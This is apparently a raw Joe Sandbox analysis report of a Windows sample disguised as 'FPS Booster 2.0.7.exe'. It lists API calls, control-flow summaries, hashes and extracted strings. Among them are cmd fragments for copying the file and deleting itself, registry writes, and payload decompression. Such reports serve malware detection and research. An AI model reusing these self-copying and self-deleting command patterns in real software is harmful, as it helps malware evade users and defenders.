                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 0040136B
                                                • PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 00401375
                                                • GetWindowsDirectoryA.KERNEL32(00404C84,00001000), ref: 00401385
                                                • GetTempPathA.KERNEL32(00001000,00405C84), ref: 0040139F
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 004013BB
                                                • GetEnvironmentVariableA.KERNEL32(APPDATA,00407C84,00001000), ref: 004013DD
                                                  • Part of subcall function 00401907: FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401917
                                                  • Part of subcall function 00401907: ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                • FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 0040144C
                                                • SizeofResource.KERNEL32(00000000,00000000,00000000,00000001,0000000A,00000001), ref: 00401462
                                                • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000001,0000000A,00000001), ref: 0040147D
                                                • ExitProcess.KERNEL32(?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000,00406C84,FPS Booster 2.0.7.exe), ref: 00401897
                                                • ExitProcess.KERNEL32(00000000,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000,00406C84,FPS Booster 2.0.7.exe), ref: 0040189E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: Resource$ExitProcess$DirectoryFindPath$BackslashEnvironmentFileLoadModuleNameSizeofSystemTempVariableWindows
                                                • String ID: /c ping -n 3 127.0.0.1 & copy /Y "$APPDATA$C:\Dir1\SubDir$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\$C:\Windows\system32\$FPS Booster 2.0.7.exe$hF$hF$open
                                                • API String ID: 1865746177-1906841479
                                                • Opcode ID: 4de04ce6448b2387a50d34b486c6be45e57025f18a70911a56270827189b1638
                                                • Instruction ID: 87517960ec9dbd09822493e96d6633269da166b851f384452dd9e845d648968f
                                                • Opcode Fuzzy Hash: 4de04ce6448b2387a50d34b486c6be45e57025f18a70911a56270827189b1638
                                                • Instruction Fuzzy Hash: 3ED18271A44205AFFB24AFA1DD42FA93AB4EB04715F20403BF501B51F1DBBD6A908B1E

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32(Shell32.dll,0040111C), ref: 004011D4
                                                • GetProcAddress.KERNEL32(ShellExecuteA,Shell32.dll), ref: 004011E9
                                                • GetProcAddress.KERNEL32(SHGetSpecialFolderPathA,0040111C), ref: 004011FE
                                                • LoadLibraryA.KERNEL32(shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 0040120D
                                                • GetProcAddress.KERNEL32(PathFindFileNameA,shlwapi.dll), ref: 00401222
                                                • GetProcAddress.KERNEL32(PathAddBackslashA,PathFindFileNameA), ref: 00401237
                                                • LoadLibraryA.KERNEL32(advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401246
                                                • GetProcAddress.KERNEL32(RegCreateKeyExA,advapi32.dll), ref: 0040125B
                                                • GetProcAddress.KERNEL32(RegSetValueExA,RegCreateKeyExA), ref: 00401270
                                                • GetProcAddress.KERNEL32(RegCloseKey,RegSetValueExA), ref: 00401285
                                                • LoadLibraryA.KERNEL32(ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401294
                                                • GetProcAddress.KERNEL32(RtlDecompressBuffer,ntdll.dll), ref: 004012A9
                                                • GetModuleFileNameA.KERNEL32(00000000,0040BC84,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 004012BF
                                                • GetEnvironmentVariableA.KERNEL32(ComSpec,0040FC84,00000500,00000000,0040BC84,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA), ref: 004012D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$EnvironmentFileModuleNameVariable
                                                • String ID: ComSpec$PathAddBackslashA$PathFindFileNameA$RegCloseKey$RegCreateKeyExA$RegSetValueExA$RtlDecompressBuffer$SHGetSpecialFolderPathA$Shell32.dll$ShellExecuteA$advapi32.dll$ntdll.dll$shlwapi.dll
                                                • API String ID: 3647900824-1083084054
                                                • Opcode ID: ed63defba397cbb933b777222a0bacb8b6594ff129ae780b5b0ed5781ffeacf7
                                                • Instruction ID: a06bb1d97dbf063ac68fad512a01dcc274482fcad67705a1e8ff053d2cfa1aac
                                                • Opcode Fuzzy Hash: ed63defba397cbb933b777222a0bacb8b6594ff129ae780b5b0ed5781ffeacf7
                                                • Instruction Fuzzy Hash: AC11AA70A423046EE751BF32ED02BA93E75E790B45B20813BB440751F9E7FD19A19B1C

                                                Control-flow Graph

                                                APIs
                                                • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                  • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                  • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                  • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                  • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                  • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                  • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                  • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                  • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                  • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                • String ID:
                                                • API String ID: 673778540-0
                                                • Opcode ID: cfbab243bfee9b5cb56ef1db76fa81e74447810506c232cb5a36ea3a31cdea14
                                                • Instruction ID: a064688063e39c940ae72a4b90be644b02f79907e5f24655d35d5466687fb791
                                                • Opcode Fuzzy Hash: cfbab243bfee9b5cb56ef1db76fa81e74447810506c232cb5a36ea3a31cdea14
                                                • Instruction Fuzzy Hash: FBD067749452006AE6217F71AE02B143E64E70074BF10407AB6057A1F5EB786A10670D

                                                Control-flow Graph

                                                control_flow_graph 129 4011af-4011bc GetPEB 130 4011c3 129->130 131 4011be 129->131 132 401b16-401b1d ExitProcess 130->132 131->132
                                                APIs
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: b282020c020ec24376e01dd257daea11e10f1f4ac2a3929f2a510d4130da15fc
                                                • Instruction ID: 363a1f89bed63b7dcc895a87b01cf0a5ad2b70b8edfb3c7b62b81fcb133e7216
                                                • Opcode Fuzzy Hash: b282020c020ec24376e01dd257daea11e10f1f4ac2a3929f2a510d4130da15fc
                                                • Instruction Fuzzy Hash: E7C09234268A84CAE219AB08C15AF1133B5BB40B45FA1846BB2152A8F293BCA810E44A

                                                Control-flow Graph

                                                control_flow_graph 125 40119d-4011a7 GetPEB 126 4011a9 125->126 127 4011ae 125->127 128 401b16-401b1d ExitProcess 126->128 127->128
                                                APIs
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 016bcc260c57d67281d0a185370db58a258a073e77d6077e442bffbde582f7fc
                                                • Instruction ID: e0a2e36e3d8c8f3e554d3af8483bffc66267ff5874ff8d07cdc79a1876b45754
                                                • Opcode Fuzzy Hash: 016bcc260c57d67281d0a185370db58a258a073e77d6077e442bffbde582f7fc
                                                • Instruction Fuzzy Hash: 62B092306599809AE21AA318801AF917AB26F40B45FDAC4A7F206298F253BCA944D10A

                                                Control-flow Graph

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401917
                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 0040192D
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: Resource$ExitFindProcessSizeof
                                                • String ID: hF$hF
                                                • API String ID: 1411291463-20560811
                                                • Opcode ID: b165bb457e95d8592b2aa645c08f3646812f0134a3116199941ac9cacd79966e
                                                • Instruction ID: d4e59189b2e6214e03afd5d0d5579af94f7f612efc73c1461bf72c218524a00d
                                                • Opcode Fuzzy Hash: b165bb457e95d8592b2aa645c08f3646812f0134a3116199941ac9cacd79966e
                                                • Instruction Fuzzy Hash: FD412BB1A54204EFFB00DF65ED81B693BB4EB54305F10407BF905BA2B1E7B46960DB19

                                                Control-flow Graph

                                                APIs
                                                • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                • UpdateWindow.USER32(00000001), ref: 004010C7
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                • TranslateMessage.USER32(?), ref: 004010E4
                                                • DispatchMessageA.USER32(?), ref: 004010ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                • String ID: 0$WinClass32
                                                • API String ID: 282685165-2329282442
                                                • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                Control-flow Graph

                                                APIs
                                                • SendMessageA.USER32(?,00009D99,00000000,00000000), ref: 00401128
                                                • DefWindowProcA.USER32(?,00000002,?,?), ref: 0040114E
                                                  • Part of subcall function 0040135A: GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 0040136B
                                                  • Part of subcall function 0040135A: PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 00401375
                                                  • Part of subcall function 0040135A: GetWindowsDirectoryA.KERNEL32(00404C84,00001000), ref: 00401385
                                                  • Part of subcall function 0040135A: GetTempPathA.KERNEL32(00001000,00405C84), ref: 0040139F
                                                  • Part of subcall function 0040135A: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 004013BB
                                                  • Part of subcall function 0040135A: GetEnvironmentVariableA.KERNEL32(APPDATA,00407C84,00001000), ref: 004013DD
                                                  • Part of subcall function 0040135A: FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 0040144C
                                                  • Part of subcall function 0040135A: ExitProcess.KERNEL32(00000000,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000,00406C84,FPS Booster 2.0.7.exe), ref: 0040189E
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: DirectoryPath$BackslashEnvironmentExitFileFindMessageModuleNameProcProcessResourceSendSystemTempVariableWindowWindows
                                                • String ID:
                                                • API String ID: 1588881643-0
                                                • Opcode ID: f65326d40c1053b06fdae5316820f508df888febf5844a30f467ce6d3140b480
                                                • Instruction ID: dbb62d9085e5d6b3fbefb86f4113f67887605609739cbfea317797e2dab6c195
                                                • Opcode Fuzzy Hash: f65326d40c1053b06fdae5316820f508df888febf5844a30f467ce6d3140b480
                                                • Instruction Fuzzy Hash: 51F01C31244209B6DF296E629C07B5A3762AB08719F10C03BFB197C0F297BDD561AA5E

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                                • Instruction ID: 0611be33569e033cf0bcc92f54b95211119f9e80a1ee943285cb6afbe40d6e6f
                                                • Opcode Fuzzy Hash: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                                • Instruction Fuzzy Hash: 91C012B711004827CB08C549D8429D6B798E6B5265714411FF912EB291D97CE90185A4

                                                Control-flow Graph

                                                APIs
                                                • lstrcpyA.KERNEL32(0040DC84), ref: 004018AD
                                                • lstrcatA.KERNEL32(0040DC84,0040AC84,0040DC84), ref: 004018BC
                                                • lstrcatA.KERNEL32(0040DC84," ",0040DC84,0040AC84,0040DC84), ref: 004018CB
                                                • lstrcatA.KERNEL32(0040DC84,0040BC84,0040DC84," ",0040DC84,0040AC84,0040DC84), ref: 004018DA
                                                • lstrcatA.KERNEL32(0040DC84," >> NUL,0040DC84,0040BC84,0040DC84," ",0040DC84,0040AC84,0040DC84), ref: 004018E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: lstrcat$lstrcpy
                                                • String ID: " "$" >> NUL
                                                • API String ID: 2482611188-2884213582
                                                • Opcode ID: 8513afed51d29f5d4a89328734691a1c3423f533152e92d8ecba9f9dcbb9b028
                                                • Instruction ID: 98fcd78bc27786ddee7840aea87765605715515cd2fa121c906537a6fc253484
                                                • Opcode Fuzzy Hash: 8513afed51d29f5d4a89328734691a1c3423f533152e92d8ecba9f9dcbb9b028
                                                • Instruction Fuzzy Hash: CAE0A264BDD347B9F4A876E20E17F0825665B40F89F72417B7914341E66AFC7118802F

                                                Control-flow Graph

                                                APIs
                                                • lstrcpyA.KERNEL32(00410184,/c del ",0040188C,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401161
                                                • lstrcatA.KERNEL32(00410184,0040BC84,00410184,/c del ",0040188C,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002), ref: 00401170
                                                • lstrcatA.KERNEL32(00410184," >> NUL,00410184,0040BC84,00410184,/c del ",0040188C,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003), ref: 0040117F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: lstrcat$lstrcpy
                                                • String ID: " >> NUL$/c del "
                                                • API String ID: 2482611188-2706327707
                                                • Opcode ID: cd28eb0aa4a3eae105e9b4c0d92c6737ded14966b8bac3c8ed0da2462ae44cb6
                                                • Instruction ID: 17b86c2f2bfb9d9544adc925f31abe5a394b04165ab65cbffe2899ad540e7a84
                                                • Opcode Fuzzy Hash: cd28eb0aa4a3eae105e9b4c0d92c6737ded14966b8bac3c8ed0da2462ae44cb6
                                                • Instruction Fuzzy Hash: 53D0C2747D534676E4747A910E17F8425645740F49F3101BB7514341E65EFE72C1401D

                                                Execution Graph

                                                Execution Coverage:13.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2$2
                                                • API String ID: 0-3784399050
                                                • Opcode ID: 1f595bc47f431136cec88e4800207cc378688b1cba55455de8f7fd126760a026
                                                • Instruction ID: 110b82abec0daca0fc83e6f0c9a533a3553b8d1610c54f1e97b035446cb6541e
                                                • Opcode Fuzzy Hash: 1f595bc47f431136cec88e4800207cc378688b1cba55455de8f7fd126760a026
                                                • Instruction Fuzzy Hash: FF82D470D5962D8FDBA5EF18C895BE8B7B2FB59341F5041EAD00DE3291CA35AA81CF40

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
                                                • Opcode ID: e0335ba3df83b3c18263eca50d565be838894d8d636150c513e09e41b319b208
                                                • Instruction ID: 178d9e492807cbcb4c3470cbf87ef97bccac6957e9e19bb2402420d38e000384
                                                • Opcode Fuzzy Hash: e0335ba3df83b3c18263eca50d565be838894d8d636150c513e09e41b319b208
                                                • Instruction Fuzzy Hash: 2CF10574D19A2C8FDBA4EB58C895BEDB7B1FB59340F5001AAD00DE3291CB35AA81CF41

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
                                                • Opcode ID: 4e03bb3ed2c8df34e8aa46be6455669e6b8d2c546e673080e549ed276c7a95fd
                                                • Instruction ID: d54175b0b6cef0afe94de7dc1604fc4ee4c85fc6d31ce01caeac62cc34deff06
                                                • Opcode Fuzzy Hash: 4e03bb3ed2c8df34e8aa46be6455669e6b8d2c546e673080e549ed276c7a95fd
                                                • Instruction Fuzzy Hash: 82F10574D1962D8FDBA4EB58C894BEDB7B1FB59340F5001AAD00DE3291CB39AA81CF41

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 513642393894ecc095a37b3dae694326bb073077fe85e72f46e41a586bec5c62
                                                • Instruction ID: 0bab9f4d2babef90ec2935609f0c105a6861bc30eb14ed5bb0fd1bc839d8de12
                                                • Opcode Fuzzy Hash: 513642393894ecc095a37b3dae694326bb073077fe85e72f46e41a586bec5c62
                                                • Instruction Fuzzy Hash: 62917D71D5991D9FEB94EA28D8956ECB7B2FF59340F8001B9D00DD7282DE39A981CB40

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0529c65e1f38b7e2009d77817db49a3c494cc8b0d7931db67233525916cb537e
                                                • Instruction ID: b1e6f4ffeae3d1fed22c703b9f085dd06ff8d93f8d72acd918f3f446a8206b53
                                                • Opcode Fuzzy Hash: 0529c65e1f38b7e2009d77817db49a3c494cc8b0d7931db67233525916cb537e
                                                • Instruction Fuzzy Hash: 9FC15D30918A8D8FEB68DF58D895BE937E1FB59351F00413ED80ECB291DB74A985CB81

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1402585041.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff887b20000_savesbrokerDriverSavesbroker.jbxd
                                                Similarity
                                                • API ID: FullImageNameProcessQuery
                                                • String ID:
                                                • API String ID: 3578328331-0
                                                • Opcode ID: 2ccc17cc5717f39c6951c7cb20d9d003f378ddbfb656eaf68c21df0f9ba41c43
                                                • Instruction ID: f25c59d40309ac03561141c195881ec051a03336d9a3f344a6eb049494ae59c9
                                                • Opcode Fuzzy Hash: 2ccc17cc5717f39c6951c7cb20d9d003f378ddbfb656eaf68c21df0f9ba41c43
                                                • Instruction Fuzzy Hash: 02B13B30518A8D8FEB78DF58C895BE93BE1FB59341F10412ED84ECB291DB74A985CB81

                                                Execution Graph

                                                Execution Coverage:16%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:12.3%
                                                Total number of Nodes:1932
                                                Total number of Limit Nodes:48
5891->5886 5892->5891 5893->5871 5894->5879 6235 401cd5 6236 401446 18 API calls 6235->6236 6237 401cdd 6236->6237 6238 401446 18 API calls 6237->6238 6239 401ce8 6238->6239 6240 40145c 18 API calls 6239->6240 6241 401cf1 6240->6241 6242 401d07 lstrlenW 6241->6242 6243 401d43 6241->6243 6244 401d11 6242->6244 6244->6243 6248 406035 lstrcpynW 6244->6248 6246 401d2c 6246->6243 6247 401d39 lstrlenW 6246->6247 6247->6243 6248->6246 6249 6e9e1108 6250 6e9e1138 6249->6250 6251 6e9e15a3 3 API calls 6250->6251 6260 6e9e1146 6251->6260 6252 6e9e1203 GlobalFree 6253 6e9e1628 2 API calls 6253->6260 6254 6e9e11fe 6254->6252 6255 6e9e15a3 3 API calls 6255->6260 6256 6e9e15e0 2 API calls 6259 6e9e11ed GlobalFree 6256->6259 6257 6e9e1189 GlobalAlloc 6257->6260 6258 6e9e1223 GlobalFree 6258->6260 6259->6260 6260->6252 6260->6253 6260->6254 6260->6255 6260->6256 6260->6257 6260->6258 6261 6e9e164f lstrcpyW 6260->6261 6262 6e9e11cd GlobalFree 6261->6262 6262->6260 6263 402cd7 6264 401446 18 API calls 6263->6264 6267 402c64 6264->6267 6265 402d99 6266 402d17 ReadFile 6266->6267 6267->6263 6267->6265 6267->6266 6268 6ffb1c6c 6271 6ffb1c14 6268->6271 6272 6ffb2025 2 API calls 6271->6272 6273 6ffb1c1b 6272->6273 6274 6ffb2025 2 API calls 6273->6274 6275 6ffb1c22 IsWindow 6274->6275 6276 6ffb1c2f 6275->6276 6277 6ffb1c35 6275->6277 6278 6ffb13f8 GetPropW 6276->6278 6278->6277 6279 402dd8 6280 402ddf 6279->6280 6281 4030e3 6279->6281 6282 402de5 FindClose 6280->6282 6282->6281 6283 6ffb1b62 6284 6ffb2025 2 API calls 6283->6284 6285 6ffb1b68 IsWindow 6284->6285 6286 6ffb1b75 6285->6286 6287 6ffb13f8 GetPropW 6286->6287 6288 6ffb1b81 6287->6288 6289 6ffb1b93 6288->6289 6290 6ffb1e34 2 API calls 6288->6290 6290->6289 5895 401d5c 5896 40145c 18 API calls 5895->5896 5897 401d63 5896->5897 5898 40145c 18 API calls 5897->5898 5899 401d6c 5898->5899 5900 401d73 lstrcmpiW 5899->5900 5901 401d86 lstrcmpW 5899->5901 5902 401d79 5900->5902 5901->5902 5903 401c99 5901->5903 5902->5901 5902->5903 6291 
6e9e1000 6292 6e9e1859 4 API calls 6291->6292 6293 6e9e1017 6292->6293 6294 6e9e101e GlobalAlloc 6293->6294 6295 6e9e101b 6293->6295 6294->6295 6296 6e9e1880 2 API calls 6295->6296 6297 6e9e102d 6296->6297 6298 6e9e2800 6299 6e9e282f 6298->6299 6300 6e9e1c1b 29 API calls 6299->6300 6301 6e9e2836 6300->6301 6302 6e9e283d 6301->6302 6303 6e9e2849 6301->6303 6304 6e9e15e0 2 API calls 6302->6304 6305 6e9e2853 6303->6305 6306 6e9e2870 6303->6306 6309 6e9e2847 6304->6309 6310 6e9e1880 2 API calls 6305->6310 6307 6e9e289a 6306->6307 6308 6e9e2876 6306->6308 6312 6e9e1880 2 API calls 6307->6312 6311 6e9e1904 2 API calls 6308->6311 6313 6e9e2858 6310->6313 6315 6e9e287b 6311->6315 6312->6309 6314 6e9e1904 2 API calls 6313->6314 6316 6e9e285e 6314->6316 6317 6e9e15e0 2 API calls 6315->6317 6318 6e9e15e0 2 API calls 6316->6318 6319 6e9e2881 GlobalFree 6317->6319 6320 6e9e2864 GlobalFree 6318->6320 6319->6309 6321 6e9e2895 GlobalFree 6319->6321 6320->6309 6321->6309 6325 4027e3 6326 4027e9 6325->6326 6327 4027f2 6326->6327 6328 402836 6326->6328 6341 401553 6327->6341 6330 40145c 18 API calls 6328->6330 6331 40283d 6330->6331 6333 4062cf 11 API calls 6331->6333 6332 4027f9 6334 40145c 18 API calls 6332->6334 6335 401a13 6332->6335 6336 40284d 6333->6336 6337 40280a RegDeleteValueW 6334->6337 6345 40149d RegOpenKeyExW 6336->6345 6339 4062cf 11 API calls 6337->6339 6340 40282a RegCloseKey 6339->6340 6340->6335 6342 401563 6341->6342 6343 40145c 18 API calls 6342->6343 6344 401589 RegOpenKeyExW 6343->6344 6344->6332 6349 4014c9 6345->6349 6353 401515 6345->6353 6346 4014ef RegEnumKeyW 6347 401501 RegCloseKey 6346->6347 6346->6349 6350 406328 3 API calls 6347->6350 6348 401526 RegCloseKey 6348->6353 6349->6346 6349->6347 6349->6348 6351 40149d 3 API calls 6349->6351 6352 401511 6350->6352 6351->6349 6352->6353 6354 401541 RegDeleteKeyW 6352->6354 6353->6335 6354->6353 6355 4040e4 6356 4040ff 6355->6356 6362 40422d 6355->6362 6358 40413a 6356->6358 6386 403ff6 WideCharToMultiByte 
